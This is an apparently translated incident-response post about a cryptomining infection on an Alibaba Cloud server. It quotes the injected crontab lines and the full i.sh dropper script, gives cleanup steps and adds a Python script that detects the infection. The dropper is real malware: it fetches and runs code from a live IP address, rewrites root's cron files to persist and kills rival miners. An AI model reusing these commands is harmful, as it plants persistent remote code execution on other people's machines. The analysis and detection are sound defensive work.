  • Alibaba Cloud host hit by a cryptomining program

    These two lines had been injected into the crontab:

    */5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh
    */5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh

    Contents of i.sh:

    export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
    
    echo "*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh" > /var/spool/cron/root
    echo "*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh" >> /var/spool/cron/root
    mkdir -p /var/spool/cron/crontabs
    echo "*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh" > /var/spool/cron/crontabs/root
    echo "*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh" >> /var/spool/cron/crontabs/root
    
    if [ ! -f "/tmp/ddg.2021" ]; then
        curl -fsSL http://218.248.40.228:8443/2021/ddg.$(uname -m) -o /tmp/ddg.2021
    fi
    
    if [ ! -f "/tmp/ddg.2021" ]; then
        wget -q http://218.248.40.228:8443/2021/ddg.$(uname -m) -O /tmp/ddg.2021
    fi
    
    chmod +x /tmp/ddg.2021 && /tmp/ddg.2021
    
    
    if [ ! -f "/tmp/imWBR1" ]; then
        curl -fsSL http://218.248.40.228:8443/imWBR1 -o /tmp/imWBR1 --compressed
    fi
    
    ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
    ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
    ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
    ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
    ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
    ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
    #ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
    #ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill

    After reading the script, what happened is obvious.

    Confirm the entries, then delete the crontab contents in:

    /var/spool/cron/root
    /var/spool/cron/crontabs/root

    crontab -e

    Delete the dropped programs:

    /tmp/ddg.2021
    /tmp/imWBR1
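The two persistence mechanisms in this incident are both easy to check for mechanically: a cron entry that pipes a remote script straight into `sh`, and the files the script drops under /tmp. The following Python script is an added example written for this page, not part of the original post or of any tool mentioned in it. It takes the host, cron file paths and dropped-file paths from the i.sh sample above, while the function names, the constructed sample crontab (including the benign entries and the `monitor.internal.example` hostname) and the `exists` parameter are the example's own assumptions.

```python
import os
import re
from typing import Callable, Dict, List

# Indicators taken from the i.sh sample quoted on this page.
KNOWN_C2 = "218.248.40.228:8443"
DROPPED_FILES = ["/tmp/ddg.2021", "/tmp/imWBR1"]
# Both cron spool locations that i.sh overwrites.
CRON_FILES = ["/var/spool/cron/root", "/var/spool/cron/crontabs/root"]

# Matches a cron command that downloads something with curl/wget and
# pipes the result directly into sh or bash (the pattern used here).
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")

# Constructed sample crontab: two legitimate entries followed by the two
# injected lines from this page. Line numbers are 1-based.
SAMPLE_CRONTAB = """# nightly backup (legitimate, constructed)
0 3 * * * /usr/local/bin/backup.sh
*/10 * * * * curl -s http://monitor.internal.example/ping > /dev/null
*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh
*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh
"""


def find_suspicious_cron_entries(crontab_text: str) -> List[Dict[str, object]]:
    """Return the non-comment crontab lines that either pipe a download
    into a shell or reference the host seen in this incident."""
    findings: List[Dict[str, object]] = []
    for lineno, line in enumerate(crontab_text.splitlines(), 1):
        entry = line.strip()
        if not entry or entry.startswith("#"):
            continue
        reasons = []
        if PIPE_TO_SHELL.search(entry):
            reasons.append("remote script piped to shell")
        if KNOWN_C2 in entry:
            reasons.append("references known DDG download host")
        if reasons:
            findings.append({"line": lineno, "entry": entry, "reasons": reasons})
    return findings


def check_dropped_files(exists: Callable[[str], bool] = os.path.exists) -> List[str]:
    """Return which of the dropped-file paths are present on this host.
    `exists` is injectable so the check can be exercised without touching
    the real filesystem."""
    return [path for path in DROPPED_FILES if exists(path)]


def scan_cron_files(paths: List[str] = CRON_FILES) -> Dict[str, List[Dict[str, object]]]:
    """Scan the real cron spool files (those that are readable) for the
    same indicators; unreadable or missing files are skipped."""
    results: Dict[str, List[Dict[str, object]]] = {}
    for path in paths:
        try:
            with open(path, encoding="utf-8", errors="replace") as fh:
                results[path] = find_suspicious_cron_entries(fh.read())
        except OSError:
            continue
    return results


if __name__ == "__main__":
    # Demonstrate on the constructed sample first, then on the live host.
    for hit in find_suspicious_cron_entries(SAMPLE_CRONTAB):
        print(f"sample line {hit['line']}: {hit['entry']}  <- {', '.join(hit['reasons'])}")
    for path, hits in scan_cron_files().items():
        for hit in hits:
            print(f"{path}:{hit['line']}: {hit['entry']}  <- {', '.join(hit['reasons'])}")
    for path in check_dropped_files():
        print(f"dropped file present: {path}")
```

Run as root so that the spool files under /var/spool/cron are readable; the sample crontab is scanned regardless, so the script always shows the two injected entries being flagged while the two legitimate lines pass. Because i.sh rewrites both spool files every five minutes, any entry the scan reports after cleanup means the downloader is still being executed somewhere and the running process needs to be found as well.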
  • Original post: https://www.cnblogs.com/goozgk/p/8284389.html